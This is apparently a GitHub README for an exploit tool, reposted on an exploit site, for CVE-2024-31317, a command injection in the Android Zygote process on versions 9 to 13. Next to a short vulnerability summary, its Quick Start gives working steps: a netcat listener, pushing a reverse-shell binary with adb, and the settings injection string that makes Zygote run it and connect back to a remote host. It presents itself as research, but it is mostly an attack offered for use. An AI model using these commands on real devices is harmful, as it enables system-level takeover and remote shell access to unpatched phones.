## https://sploitus.com/exploit?id=3905F608-DF82-513C-917B-A50D88A07630
# CVE-2024-31317 Deployer



## ๐ Security Research Statement
**This project is intended solely for security research and educational purposes. Using this tool for unauthorized testing is illegal. The author assumes no responsibility for any misuse or damage caused by its use.**
## ๐ Overview
CVE-2024-31317 is a serious security vulnerability affecting devices with Android versions 9 to 13. It allows applications with the `WRITE_SECURE_SETTINGS` permission to gain system-level privileges through command injection. This project provides a detailed technical analysis of this vulnerability, proof-of-concept code, and automated deployment tools. ### โจ Key Features
- ๐ฑ Supports Android 9-13
- ๐ ๏ธ Automated deployment scripts
- ๐ Reverse Shell connection
- ๐ Detailed technical documentation
- ๐ฏ Modular design
## ๐ Vulnerability Details
- **CVE ID**: CVE-2024-31317
- **Vulnerability Type**: Command Injection
- **Criticality Level**: High
- **CVSS Score**: 7.8
- **Affected Component**: Android Zygote process
- **Fix Status**: Fixed in the June 2024 Android security patch
## ๐ฏ Impacted Versions
### Affected Versions
- โ Android 9-13
### Not Affected Versions
- โ Android 14+ (fixed)
- โ Devices with the June 2024 or later security patches installed
## ๐ Project Structure
```
CVE-2024-31317-Deployer/
โโโ README.md
โโโ LICENSE
โโโ VULNERABILITY_ANALYSIS.md
โโโ reverse_shell.c
โโโ compile.sh
โโโ payloads/
โโโ scripts/
โโโ docs/
```
## ๐ Quick Start
### 1. Clone the Project
```bash
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
```
### 2. Compile the Payload
```bash
chmod +x compile.sh
./compile.sh
```
### 3. Deploy
```bash
# Start the listener
nc -lvnp 4444
# Push and execute
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# Inject the payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# Trigger the vulnerability
adb shell stop && adb shell start
```
## ๐ Documentation
- [Deep Technical Analysis](VULNERABILITY_ANALYSIS.md)
- [Instructions for Using the Payload](payloads/README.md)
- [Complete Usage Guide](docs/USAGE.md)
## โ ๏ธ Disclaimer
This project is intended only for security research and educational purposes. Using this tool means you agree to:
- Comply with all applicable laws and regulations
- Use it only for legitimate security research
- Take full responsibility for your actions
## ๐ License
This project uses the MIT license โ see the [LICENSE](LICENSE) file for details.
## ๐จโ๐ป Author
**fcy10012** - [GitHub](https://github.com/fcy10012)
## ๐ Thanks
Reference project: [WebLDix/CVE-2024-31317-PoC-Deployer](https://github.com/WebLDix/CVE-2024-31317-PoC-Deployer)
---
**โญ If this project helps you, please star it!**